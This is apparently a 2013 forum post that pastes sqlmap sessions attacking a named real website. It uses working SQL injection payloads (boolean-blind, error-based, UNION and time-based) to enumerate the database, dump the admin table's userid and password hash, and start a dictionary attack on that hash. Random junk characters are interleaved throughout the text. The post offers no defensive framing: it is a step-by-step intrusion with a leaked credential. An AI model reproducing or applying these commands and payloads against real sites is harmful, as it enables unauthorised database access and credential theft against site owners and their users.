D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db( x$ M4 J# V( _9 ?
ms "Mysql" --current-user /* 注解:获取当前用户名称% Y4 y" S3 C& _1 y% m
sqlmap/0.9 - automatic SQL injection and database takeover tool: ^: c! R2 ?" M* M3 d1 ]/ M
http://sqlmap.sourceforge.net starting at: 16:53:54' U) p* e, k( j
[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
" E2 a) c" T) V' c* [0 H session file
$ B# j: P- x4 R) d[16:53:54] [INFO] resuming injection data from session file% W" g4 P* D. _' A0 U* p6 R
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
* R1 F( v, z& K5 {" F& `: Y2 Z1 L[16:53:54] [INFO] testing connection to the target url! h9 x" x w6 o6 D: M- x
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
6 R$ q& A. H( W5 F& H% }2 xsts:1 N6 B! V, y; S- P$ G1 f
---
8 {& k* T3 S( C& D1 t( h) J& ?Place: GET/ h$ n9 E/ \+ q/ e6 n
Parameter: id
- _% C( x+ C' | Type: boolean-based blind( Y$ N5 P+ e. H6 t$ A; C$ F
Title: AND boolean-based blind - WHERE or HAVING clause
: `- S# t$ y- q, Q" V7 Y+ C Payload: id=276 AND 799=799
d I4 D# i0 |2 p: C Type: error-based ^% X* a# @5 @$ }9 z4 u9 ]
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause, N' Q4 |6 _4 t" J2 r$ c. J8 R
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
/ ?4 z4 _" L6 B2 i4 r$ V120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58* G6 q8 Z3 U8 R7 [: k8 o7 ?
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
8 c( n& T% ?0 f9 t, A: k Type: UNION query
- E$ z" H. j8 T2 n+ z8 w Title: MySQL UNION query (NULL) - 1 to 10 columns- t7 Z) @2 P- H
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
6 l3 U3 h: a2 d' d ^/ ^! M(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),- M- L- w; ^6 S( Y* h% r7 c% s+ z( E! m
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#; }/ a9 w ?6 ?, M g
Type: AND/OR time-based blind3 }- t2 i- g5 r. \
Title: MySQL > 5.0.11 AND time-based blind
! f: f* E3 \: S; z! A2 i5 k Payload: id=276 AND SLEEP(5)7 e' D0 q( ~" |2 z# S; F
---
5 t7 D$ O0 ]/ K) v1 l[16:53:55] [INFO] the back-end DBMS is MySQL: Y. I/ C/ o9 W" v: h
web server operating system: Windows3 P& h6 ?$ k# r( I) w
web application technology: Apache 2.2.11, PHP 5.3.0! X8 D& T% O' L5 z6 Z* F
back-end DBMS: MySQL 5.0
. e0 |" T w/ X[16:53:55] [INFO] fetching current user$ _. o/ W- R' _3 ?1 N
current user: 'root@localhost' 6 S1 U$ G' {# p, p+ H5 {
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou4 E& y8 V& i( V
tput\www.wepost.com.hk' shutting down at: 16:53:58% s& Q7 ~3 r; r% a5 i0 h8 D$ f- E* a$ n
( P6 ?+ Z6 J1 X; |" _; w5 @" ~
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
- u- U# c) X5 W/ D' a7 ams "Mysql" --current-db /*当前数据库
& v* T5 a/ v+ u/ B+ `9 W sqlmap/0.9 - automatic SQL injection and database takeover tool
% S2 |- }+ k% \) Y: F http://sqlmap.sourceforge.net starting at: 16:54:16
2 Q. h- B# J" H( b2 u[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
) N# l K M, O2 W8 m6 I/ ] session file
7 o; L* ]+ Q2 I+ {3 x$ t[16:54:16] [INFO] resuming injection data from session file
, B/ w/ G. X% J4 ^$ [" R[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
* I( ^$ g- v- Y* o& l[16:54:16] [INFO] testing connection to the target url, F6 y, R. K3 i. [4 Z; ]0 s
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
1 v( F; c# p) S7 `( Usts:
1 `( f0 i! b! u+ S! F---
0 K' [& V7 V$ @# ?1 G, k) ~) R5 ~! ?Place: GET/ |) d# y0 g4 J
Parameter: id
6 r& ~% d) A: n" ]" b0 x, V( {) N Type: boolean-based blind
7 W/ H; W% T; f5 @ Title: AND boolean-based blind - WHERE or HAVING clause
& y* l4 z6 @& N Payload: id=276 AND 799=799- F& v( i. e2 [" s0 m$ ~
Type: error-based
C( X" k* j+ B* y: t9 x9 j Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
0 [: J6 h& I* ] Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
# w& f. p, i+ \: W4 H+ L Z120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
" g% y3 G; a. I) F/ I),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)7 F: b. g" C1 @* d8 g$ d) ~' B
Type: UNION query
' F4 w! V2 h: x, v Title: MySQL UNION query (NULL) - 1 to 10 columns1 b& F; q" P. \$ W
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
8 t7 Z+ L. b/ _6 X0 V(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
( _& z' V! L+ ]; oCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
9 |4 D9 \5 K3 d9 d0 m; l4 S0 [% B Type: AND/OR time-based blind
$ F3 t6 h; }9 p; n Title: MySQL > 5.0.11 AND time-based blind
$ T4 e8 Y* X+ e7 K3 C& |8 t8 A# n Payload: id=276 AND SLEEP(5)
; _4 F0 l$ p4 _3 ^) |---
# B {. |. I& c& ^% ` T[16:54:17] [INFO] the back-end DBMS is MySQL
6 s+ D5 p1 n& Mweb server operating system: Windows
& _4 {7 h9 L% f1 L$ gweb application technology: Apache 2.2.11, PHP 5.3.0( g2 K# \) Z( @$ l# ^
back-end DBMS: MySQL 5.0
/ h" s- L: G0 {; }, f4 z, L4 o8 B1 E) c[16:54:17] [INFO] fetching current database# E* x6 V5 E- l/ |8 S0 `$ i+ {- }
current database: 'wepost'! e" J c6 m; k ]
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
0 w: r7 f0 d+ c! ctput\www.wepost.com.hk' shutting down at: 16:54:182 h( G6 Z" X }# J1 r
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db- A$ g& e7 ~$ p
ms "Mysql" --tables -D "wepost" /*获取当前数据库的表名
4 N9 v/ Z; J O7 z1 S! ^& f w sqlmap/0.9 - automatic SQL injection and database takeover tool
" w3 o8 _* a8 S+ E, T http://sqlmap.sourceforge.net starting at: 16:55:259 u; c/ @5 _+ \7 _
[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
|4 M: S/ n) y2 q' p session file
# L; `4 K# k( n# C/ F[16:55:25] [INFO] resuming injection data from session file
) {$ U. c# M4 G$ a$ m0 k[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
! E* k7 `- g5 \" i* A[16:55:25] [INFO] testing connection to the target url3 |3 m& S* z- f& }
sqlmap identified the following injection points with a total of 0 HTTP(s) reque" z" P" d/ Y$ w% { J, ~
sts:9 b8 c" {. ^! y7 M- [+ [) T
---
& N8 U% ?2 s4 EPlace: GET
5 }! b5 D; ]8 t+ n* }- bParameter: id- j; F7 ~6 q% ^
Type: boolean-based blind* y5 X; V9 ?2 c% f7 s
Title: AND boolean-based blind - WHERE or HAVING clause
& b+ q2 g* \* N5 } Payload: id=276 AND 799=799
- L2 ~" S; v; ?) d" I2 K Type: error-based% p/ V& q4 y/ ?3 y, |- [" h' J
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
" p6 G2 r) R& F' i+ \5 K Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,. G& L( H" A, q. w7 ?
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
: _ M$ i# M0 X4 G M),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)/ k8 `6 i6 O& W5 ^! u1 N! R
Type: UNION query% B$ ~: O: B% q- p
Title: MySQL UNION query (NULL) - 1 to 10 columns0 z1 w& M/ e9 ^( X
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
7 w! |5 B- a/ n' L Q" G(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
4 x' p) I, h" J7 y* Z/ KCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
} Y* K+ p2 e1 w$ o3 x: u: R* m Type: AND/OR time-based blind7 }- K/ U5 ?. b
Title: MySQL > 5.0.11 AND time-based blind; y; t( t& @, { z: T
Payload: id=276 AND SLEEP(5)7 r7 a% o j: l
---
' v3 v' X+ N% ^4 M- ]" }[16:55:26] [INFO] the back-end DBMS is MySQL1 a1 m \- ~9 c6 Q+ B+ C6 Z
web server operating system: Windows9 F- ^$ p5 l7 C! W& S4 g# P7 t6 @
web application technology: Apache 2.2.11, PHP 5.3.0
' ]/ X( F" Q8 J; b8 g* f; Kback-end DBMS: MySQL 5.0% q) g( b- [ G2 i( K5 s7 v
[16:55:26] [INFO] fetching tables for database 'wepost'6 {, ?' K6 E4 S6 v1 c
[16:55:27] [INFO] the SQL query used returns 6 entries* H# f8 L: _2 l8 |# D& h0 ~9 g
Database: wepost, @% t0 B8 a+ F9 V7 o
[6 tables]5 {- z6 h5 @/ _; H
+-------------+6 J0 s f% T6 k& f# Q
| admin |2 }% x: c& D3 p; f/ m/ C$ t/ G' z
| article |! ~+ K4 S6 g; u* k* Y5 H
| contributor |
4 u( Z5 k* b3 W2 h8 A| idea |
: W7 Y. B& N& K0 W) Y/ w| image |
, @. I; ], f& h! B' y| issue |5 a. X t; x" |; S
+-------------+. G7 K9 m* s# I+ [2 N- E
[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou( b% k: Q2 c- `
tput\www.wepost.com.hk' shutting down at: 16:55:33
; ~2 \1 D% t( A+ h W4 e+ P2 v9 k0 r: e
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
& w0 O8 f9 n5 T2 b/ c8 g mms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /*获取admin表的字段名' P7 l6 h( e3 ]7 g& _0 O4 r
sqlmap/0.9 - automatic SQL injection and database takeover tool
$ `: Z0 u" W. u, \ E& y, i2 N8 ` http://sqlmap.sourceforge.net starting at: 16:56:061 R# W& q. N' Y; U/ I; P! K- x
sqlmap identified the following injection points with a total of 0 HTTP(s) reque% R3 F8 m/ S; e l+ j
sts:
: ? ]- F, }# H+ L7 |, E: Q--- A2 u( r- y+ `
Place: GET
( @; r: K3 C* b# dParameter: id
. |" P2 q$ t- M B& ^, _" e. \ Type: boolean-based blind
5 O7 E& q4 {( w7 V$ w1 |" r4 N0 Q+ I; C Title: AND boolean-based blind - WHERE or HAVING clause6 K7 V+ Q6 ?" M
Payload: id=276 AND 799=799* S0 u9 Y% x& H) C! v# m
Type: error-based, y3 C8 [: @; w+ z$ o# A
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
) C( k8 G1 l% z0 b6 w5 U7 Q; R Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,& s0 p: c9 z# d& Y# V
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,582 i0 P( O: r' o" z _
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)4 W! x2 M A! V) t3 t3 ]
Type: UNION query, G f5 a$ C0 H# S0 M# W' `
Title: MySQL UNION query (NULL) - 1 to 10 columns
. x a: A+ r! C* A* W Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR% k- ~# b9 O2 ?( n# \3 v4 K7 u& m1 K
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
$ W% u" q7 r" _& ~+ M) \CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#) R* n' K) q+ `2 m [
Type: AND/OR time-based blind& m0 ]. y0 `3 ^( n) a5 w0 T7 i! C
Title: MySQL > 5.0.11 AND time-based blind
! i2 S" Q$ _# f/ E Payload: id=276 AND SLEEP(5)
m9 v% ^) }2 ?---
( h. X* Z" q6 K; Y0 j1 g' [web server operating system: Windows
( u! g* \- {! }* A6 E& z7 X; W! rweb application technology: Apache 2.2.11, PHP 5.3.0, t y; x( L( ^
back-end DBMS: MySQL 5.0
: B! m" U. {9 A, |8 u+ D8 r. j[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se: B$ q4 j* s t5 Q- }0 F( M" }
ssion': wepost, wepost
9 y C0 ^: ?$ d1 W' ?Database: wepost
' j9 a" t3 i$ I( W2 u4 M ]Table: admin# Q, K. r# Z; a1 W3 n* }) g
[4 columns]. w } H& p: n- B( C' i
+----------+-------------+
, t2 K/ c1 r& S- c# N X4 Y| Column | Type |
t4 K( f7 C/ Y# b+----------+-------------+
. A& g; f4 X; a3 V8 H& l7 X6 k8 I| id | int(11) |
$ Q! q* k8 @. J/ L$ ^; ?| password | varchar(32) |$ N" }& N2 Y+ V5 X/ B
| type | varchar(10) |2 `# v; J2 P4 c% Q$ L4 ~( P
| userid | varchar(20) |
+ f8 y2 U2 F" a+ N M: [+----------+-------------+
8 C; Y0 z, p' P% B8 S' d shutting down at: 16:56:19" f2 x2 u8 D6 K* L; Q \
6 x9 C+ n# \) d3 R) Y4 j) J" dD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db/ w7 J; y! |$ C
ms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /*获取字段里面的内容
( C5 M1 q* }3 B) T" w5 d sqlmap/0.9 - automatic SQL injection and database takeover tool
4 I. ^# V+ y7 q, ~. L http://sqlmap.sourceforge.net starting at: 16:57:14! x( @& ^4 p% \! Q H7 u2 V
sqlmap identified the following injection points with a total of 0 HTTP(s) reque3 Q! n% a- O6 w7 P) m4 ~$ B* f0 c
sts:
# t: P# k Q! z: l- E0 I5 Y# L---
+ F. h% W' Y( `7 s' S1 {% dPlace: GET
) q) l8 Y0 X0 FParameter: id
! o# Y& }1 [+ K- k' [ Type: boolean-based blind
6 O, \ m" }* b1 e Title: AND boolean-based blind - WHERE or HAVING clause
* N" v" u6 S" X: i7 k+ e Payload: id=276 AND 799=799- R, h! m2 a3 Z$ p7 b6 v6 `- l
Type: error-based+ H1 n. [1 t6 n6 _% t
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
! }- X$ o% V6 c+ s Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
* M' m$ l8 h7 _! v r G, t# B120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,584 Z& U) b& c) h# v0 t
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
$ X4 L- Y+ w# r, E Type: UNION query( n3 |; ]; I8 ]; d, Q
Title: MySQL UNION query (NULL) - 1 to 10 columns. d, q! c- P) P- Z
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
) a7 j" x K2 n' [% W" d(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),7 ^: b5 `6 L8 y4 }2 O
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#% p8 X' |$ W* P0 D
Type: AND/OR time-based blind7 o9 G% B& I0 K2 N. U
Title: MySQL > 5.0.11 AND time-based blind. |9 H/ x# ~) s. u
Payload: id=276 AND SLEEP(5)
! u8 Z& R* p3 t2 C) f5 P t* L; @---+ p# Y1 w, ~* L, D) ~0 I0 x: v
web server operating system: Windows
1 Y7 W$ U& ^6 |5 ^web application technology: Apache 2.2.11, PHP 5.3.0
! t+ l9 y' A1 d' I& Aback-end DBMS: MySQL 5.0- T( y, F) c4 m3 V; n
recognized possible password hash values. do you want to use dictionary attack o e* E3 O1 [) \' q( ?6 b
n retrieved table items? [Y/n/q] y
. ], d$ \/ M# Fwhat's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
2 B. ] h9 H4 Odo you want to use common password suffixes? (slow!) [y/N] y
9 \+ P; }; \: N( i2 lDatabase: wepost) a& d$ b- P5 C2 a
Table: admin
) E' B" c( ?8 U8 o: S[1 entry]
1 {9 N3 c7 `, P* M+----------------------------------+------------+
; U% @4 Q+ H& w) }# `+ e+ e| password | userid |
1 D$ k. F# v) Q6 f' V+----------------------------------+------------+7 t- d" f) G3 ]& G# s2 G5 R
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |; a: F# s5 J& y8 v! ~' g) J
+----------------------------------+------------+
! x/ ~- b: D, R" U* R) l shutting down at: 16:58:14) Y% T6 ? p5 h* F9 J/ t
2 N! Y. B$ R/ _4 L6 cD:\Python27\sqlmap> |
发表于 2013-4-4 22:18:49
收藏
支持
反对